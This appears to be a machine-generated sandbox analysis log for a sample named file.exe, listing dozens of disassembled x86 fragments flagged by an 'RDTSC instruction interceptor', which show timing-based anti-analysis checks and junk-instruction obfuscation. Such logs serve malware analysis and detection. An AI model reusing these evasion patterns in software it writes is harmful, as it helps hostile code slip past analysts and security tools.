Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C2F89 second address: 4C2FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 jmp 00007F8B150D74EFh 0x0000000d jmp 00007F8B150D74F9h 0x00000012 pop edx 0x00000013 jnp 00007F8B150D74E8h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C2FC2 second address: 4C2FCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F8B146BCD56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C2FCE second address: 4C2FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C2FD2 second address: 4C2FD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C313D second address: 4C3151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8B150D74ECh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C354A second address: 4C355F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B146BCD5Dh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C71F8 second address: 4C7202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7202 second address: 341A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xor dword ptr [esp], 1700900Ah 0x0000000d push eax 0x0000000e mov edx, dword ptr [ebp+122D1963h] 0x00000014 pop edx 0x00000015 push dword ptr [ebp+122D0421h] 0x0000001b mov dword ptr [ebp+122D1987h], ebx 0x00000021 call dword ptr [ebp+122D1BC1h] 0x00000027 pushad 0x00000028 xor dword ptr [ebp+122D218Ch], ecx 0x0000002e xor eax, eax 0x00000030 jnl 00007F8B146BCD65h 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a sub dword ptr [ebp+122D218Ch], edi 0x00000040 mov dword ptr [ebp+122D2B01h], eax 0x00000046 jns 00007F8B146BCD5Fh 0x0000004c mov esi, 0000003Ch 0x00000051 sub dword ptr [ebp+122D218Ch], edi 0x00000057 sub dword ptr [ebp+122D218Ch], esi 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 add dword ptr [ebp+122D218Ch], ebx 0x00000067 lodsw 0x00000069 jnp 00007F8B146BCD5Ch 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 jne 00007F8B146BCD5Ch 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d sub dword ptr [ebp+122D218Ch], ebx 0x00000083 pushad 0x00000084 add dword ptr [ebp+122D19ADh], edx 0x0000008a add edx, 33F31554h 0x00000090 popad 0x00000091 push eax 0x00000092 push eax 0x00000093 push edx 0x00000094 pushad 0x00000095 push eax 0x00000096 push edx 0x00000097 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7267 second address: 4C72D0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8B150D74FDh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d movzx edi, bx 0x00000010 jmp 00007F8B150D74ECh 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F8B150D74E8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov si, ACDCh 0x00000035 push 75E7CCD1h 0x0000003a jo 00007F8B150D74EEh 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C72D0 second address: 4C7335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 xor dword ptr [esp], 75E7CC51h 0x0000000c movzx edi, di 0x0000000f push 00000003h 0x00000011 movzx ecx, si 0x00000014 push 00000000h 0x00000016 add dword ptr [ebp+122D1ADDh], ecx 0x0000001c push 00000003h 0x0000001e push BF3959B3h 0x00000023 push ebx 0x00000024 push eax 0x00000025 pushad 0x00000026 popad 0x00000027 pop eax 0x00000028 pop ebx 0x00000029 xor dword ptr [esp], 7F3959B3h 0x00000030 mov dword ptr [ebp+122D19E2h], esi 0x00000036 lea ebx, dword ptr [ebp+1245916Ch] 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 jmp 00007F8B146BCD68h 0x00000045 jmp 00007F8B146BCD5Ch 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C741F second address: 4C7434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push ecx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7434 second address: 4C746C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push esi 0x0000000a jmp 00007F8B146BCD64h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 push esi 0x00000016 pushad 0x00000017 popad 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F8B146BCD5Eh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C746C second address: 4C7470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7470 second address: 4C7511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F8B146BCD58h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 sub edi, dword ptr [ebp+122D29A1h] 0x00000028 push 00000003h 0x0000002a mov cl, C0h 0x0000002c push 00000000h 0x0000002e je 00007F8B146BCD5Ch 0x00000034 and esi, dword ptr [ebp+122D2891h] 0x0000003a push 00000003h 0x0000003c call 00007F8B146BCD60h 0x00000041 mov dword ptr [ebp+122D1860h], eax 0x00000047 pop esi 0x00000048 mov dword ptr [ebp+122D185Ah], ecx 0x0000004e push 8D582125h 0x00000053 ja 00007F8B146BCD5Eh 0x00000059 add dword ptr [esp], 32A7DEDBh 0x00000060 mov esi, 1419A800h 0x00000065 lea ebx, dword ptr [ebp+12459175h] 0x0000006b cld 0x0000006c xchg eax, ebx 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007F8B146BCD67h 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7511 second address: 4C7522 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7574 second address: 4C7582 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7582 second address: 4C7588 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7588 second address: 4C7656 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8B146BCD69h 0x00000008 jnl 00007F8B146BCD56h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 jl 00007F8B146BCD5Bh 0x00000018 push 00000000h 0x0000001a mov di, ax 0x0000001d call 00007F8B146BCD59h 0x00000022 jnp 00007F8B146BCD63h 0x00000028 push eax 0x00000029 pushad 0x0000002a jnp 00007F8B146BCD6Ch 0x00000030 pushad 0x00000031 jmp 00007F8B146BCD66h 0x00000036 push eax 0x00000037 pop eax 0x00000038 popad 0x00000039 popad 0x0000003a mov eax, dword ptr [esp+04h] 0x0000003e pushad 0x0000003f jmp 00007F8B146BCD5Dh 0x00000044 je 00007F8B146BCD58h 0x0000004a push eax 0x0000004b pop eax 0x0000004c popad 0x0000004d mov eax, dword ptr [eax] 0x0000004f pushad 0x00000050 push edx 0x00000051 push edx 0x00000052 pop edx 0x00000053 pop edx 0x00000054 pushad 0x00000055 pushad 0x00000056 popad 0x00000057 jmp 00007F8B146BCD62h 0x0000005c popad 0x0000005d popad 0x0000005e mov dword ptr [esp+04h], eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push edx 0x00000067 pop edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7656 second address: 4C766C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B150D74F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C766C second address: 4C7706 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F8B146BCD58h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 call 00007F8B146BCD5Fh 0x00000028 mov dword ptr [ebp+122D1ADDh], esi 0x0000002e pop ecx 0x0000002f push 00000003h 0x00000031 mov edi, dword ptr [ebp+122D28C5h] 0x00000037 push 00000000h 0x00000039 jmp 00007F8B146BCD66h 0x0000003e push 00000003h 0x00000040 jmp 00007F8B146BCD5Eh 0x00000045 call 00007F8B146BCD59h 0x0000004a jmp 00007F8B146BCD5Ah 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 jmp 00007F8B146BCD5Eh 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7706 second address: 4C7710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F8B150D74E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7710 second address: 4C7791 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8B146BCD56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jbe 00007F8B146BCD69h 0x00000016 jmp 00007F8B146BCD63h 0x0000001b mov eax, dword ptr [eax] 0x0000001d jc 00007F8B146BCD5Ah 0x00000023 push eax 0x00000024 pushad 0x00000025 popad 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b pushad 0x0000002c push eax 0x0000002d jp 00007F8B146BCD56h 0x00000033 pop eax 0x00000034 jmp 00007F8B146BCD67h 0x00000039 popad 0x0000003a pop eax 0x0000003b sub dword ptr [ebp+122D219Ah], edi 0x00000041 mov ecx, 7AAF27B9h 0x00000046 lea ebx, dword ptr [ebp+12459180h] 0x0000004c sbb edi, 5252CCF0h 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F8B146BCD5Ch 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E8869 second address: 4E886F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E886F second address: 4E8873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E8873 second address: 4E8879 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E8879 second address: 4E889F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jg 00007F8B146BCD56h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8B146BCD66h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E889F second address: 4E88A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E88A5 second address: 4E88A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E88A9 second address: 4E88C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B150D74F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E88C2 second address: 4E88C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E88C8 second address: 4E88CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E66BC second address: 4E66CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BCD5Bh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E66CE second address: 4E66D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E685E second address: 4E6878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 jmp 00007F8B146BCD5Eh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E6B36 second address: 4E6B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B150D74F0h 0x00000009 je 00007F8B150D74E6h 0x0000000f popad 0x00000010 jmp 00007F8B150D74EEh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E6B5F second address: 4E6B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E6B67 second address: 4E6B7C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8B150D74E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F8B150D750Ah 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E6B7C second address: 4E6B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E6CF6 second address: 4E6D13 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8B150D74F0h 0x00000008 jmp 00007F8B150D74EAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007F8B150D7508h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E6D13 second address: 4E6D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E6FF4 second address: 4E6FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E716B second address: 4E7179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F8B146BCD5Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E72FA second address: 4E730F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8B150D74ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E730F second address: 4E7313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF1A2 second address: 4AF1AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF1AA second address: 4AF1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B146BCD65h 0x00000009 popad 0x0000000a jc 00007F8B146BCD5Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF1CC second address: 4AF1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E8224 second address: 4E8261 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8B146BCD56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007F8B146BCD62h 0x00000010 pop esi 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8B146BCD5Ch 0x0000001b jmp 00007F8B146BCD5Eh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E8261 second address: 4E8271 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F8B150D74EAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E83F3 second address: 4E83F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E83F7 second address: 4E840E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B150D74EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E840E second address: 4E8414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E8414 second address: 4E8419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED7F1 second address: 4ED7F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED7F7 second address: 4ED7FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED7FB second address: 4ED826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jnp 00007F8B146BCD64h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jnc 00007F8B146BCD5Eh 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0A4 second address: 4EC0A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC809 second address: 4EC813 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8B146BCD5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED8FA second address: 4ED900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED900 second address: 4ED906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F440E second address: 4F4414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4414 second address: 4F444F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F8B146BCD60h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F8B146BCD71h 0x00000015 jmp 00007F8B146BCD60h 0x0000001a jmp 00007F8B146BCD5Bh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F444F second address: 4F4467 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8B150D74ECh 0x00000008 jp 00007F8B150D74E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 jbe 00007F8B150D74E6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F3AE8 second address: 4F3B03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BCD65h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F3C8A second address: 4F3CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jno 00007F8B150D74E6h 0x0000000b jmp 00007F8B150D74F3h 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F410B second address: 4F410F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F410F second address: 4F4115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4115 second address: 4F4121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4121 second address: 4F413D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B150D74F8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F413D second address: 4F4162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BCD63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F8B146BCD5Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F42B0 second address: 4F42C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8B150D74EDh 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F61EB second address: 4F61EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6282 second address: 4F62A7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F8B150D74F1h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F8B150D74E8h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F62A7 second address: 4F62AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F62AD second address: 4F62B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
